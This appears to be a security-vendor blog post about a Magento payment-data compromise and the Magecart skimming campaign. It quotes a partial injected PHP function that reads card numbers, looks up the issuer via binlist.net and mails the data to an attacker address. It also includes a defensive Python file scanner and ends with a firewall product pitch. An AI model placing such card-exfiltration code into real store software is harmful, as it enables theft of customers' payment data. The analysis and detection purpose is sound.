As e-commerce platforms worldwide opt for stronger security measures, attackers are constantly developing new techniques to compromise these platforms and steal sensitive information provided by customers. A recent case of cyber crime, aimed at stealing highly sensitive credit card data by compromising Magento’s payment security, sheds light on the susceptible state of web security and the dire need for a stronger firewall system for sites that handle large-scale financial transactions.

How was Magento’s Payment Security compromised?

The attackers exploited a vulnerability in a targeted Magento shop by injecting a malicious piece of code that allowed them to collect personal and financial data entered by users on the compromised website. The targeted module, the Realex Payments Magento extension (SF9), allows Magento store owners to process mail and telephone orders by entering the payment details themselves. While the extension itself is not vulnerable, attackers can abuse it once they have compromised the targeted Magento shop. In this case, a malicious function called sendCcNumber(), added to an SF9 file named Remote.php, sent sensitive financial data directly to the attacker’s email address. Moreover, the attacker used the online service binlist.net to look up the Issuer Identification Number (IIN), which in turn is used to identify the institution that issued the card to the card holder.

The injected code was found in the following snippet:

function sendCcNumber() {
……
$data15 = $info->getCcType();
$data16 = substr($info->getCcNumber(), 0,6);
$issued = json_decode(file_get_contents("hxxp://www.binlist[.]net/json/".$data16));

$encode = "removed@attacker.com";
$salt = "$data9 Payment: $data15/$data16/$data17";

mail($encode, $salt, $payfull, $headr);
}

Hackers these days tend to attack the application layer of web applications, where developer faults are more probable. Take the Opencart Malware Injection for example. Attackers circumvent security measures at the application end to run their malicious code. It often happens that even highly sophisticated tools fail to uncover this hidden malware because hackers intelligently access the HTTP/HTTPS cookies.

Rise in malware attacks

2016 witnessed a rise in malware attacks, wherein multiple hacked eCommerce websites appeared to be affected by JavaScript code injected into the site, allowing the attackers to capture payment card information. Since March 2016, 100 online shops from around the world have been hacked, including well-known book publishers, fashion companies, and sporting equipment manufacturers. In another Magento attack, the attackers used benign-looking image files of products sold on the compromised website to store payment card data, which they later retrieved from the source code after downloading the image.

Researchers have been monitoring a campaign, dubbed “Magecart” by cloud-based security solutions provider RiskIQ, to analyse the pattern of attacks:

  1. Technologies affected by credit card stealers are largely the ones hosted on multiple eCommerce platforms. Magento Commerce, Powerfront CMS, and OpenCart are examples of such affected e-Commerce sites.
  2. Multiple payment services providers like Braintree and VeriSign payment processing are targets on the affected sites.
  3. Attackers host formgrabber/credit card stealer content on remotely operated sites, served over HTTPS, while exfiltrating stolen data using HTTPS.
  4. Attackers refine their malicious content in an attempt to blend their malware into commonplace web technologies.

How to protect your website?

Such attacks are on the rise, and cyber-criminals use various tricks to keep their malware from being detected. Online shop owners must update their software periodically. The malicious files used in such attacks can often be identified based on their “last modified” date, and the infection can be detected quickly.
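The “last modified” check described above, as an added Python example (not code from the original post or from any vendor): it flags PHP files that changed recently or that read card numbers next to an outbound call, the pattern seen in the snippet on this page. The function names, the 30-day window and the sample directory layout are assumptions; because a file's modification time can be reset, the content check runs independently of it.

```python
import os, re, tempfile, time

# Indicators taken from the snippet on this page: card-number access combined
# with an outbound channel (mail() or file_get_contents() on a remote URL).
CARD_ACCESS = re.compile(r"getCcNumber\s*\(")
OUTBOUND = re.compile(r"\bmail\s*\(|file_get_contents\s*\(\s*[\"']https?://", re.I)

def scan(root, days=30, now=None):
    """Return {relative_path: [reasons]} for PHP files that need manual review."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            if os.path.getmtime(path) >= cutoff:
                reasons.append("recently modified")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if CARD_ACCESS.search(text) and OUTBOUND.search(text):
                reasons.append("card data read next to outbound call")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def build_sample_tree(root, now):
    """Constructed sample store: one old clean file, one recently altered file."""
    samples = {
        "Helper/Data.php": ("<?php class Data {}", 400),
        "Model/Remote.php": ("<?php function sendCcNumber() {\n"
                             "  $n = substr($info->getCcNumber(), 0, 6);\n"
                             "  mail($to, $subject, $body); }", 2),
    }
    for rel, (body, age_days) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        mtime = now - age_days * 86400
        os.utime(path, (mtime, mtime))  # backdate so the sample is reproducible

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp, time.time())
        for path, reasons in scan(tmp).items():
            print(path, "->", ", ".join(reasons))
```

Comparing flagged files against a clean copy of the same extension version confirms whether a change is legitimate.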

Card fraud attempts cannot be entirely eliminated. However, Astra’s web application firewall provides a comprehensive security solution via a layered security approach, protecting your e-commerce website from malware threats and securing vulnerabilities prone to exploitation by hackers.

About The Author

Bhagyeshwari Chauhan

An engineering grad and a technical writer, Bhagyeshwari blogs about web security, futuristic tech and space science.
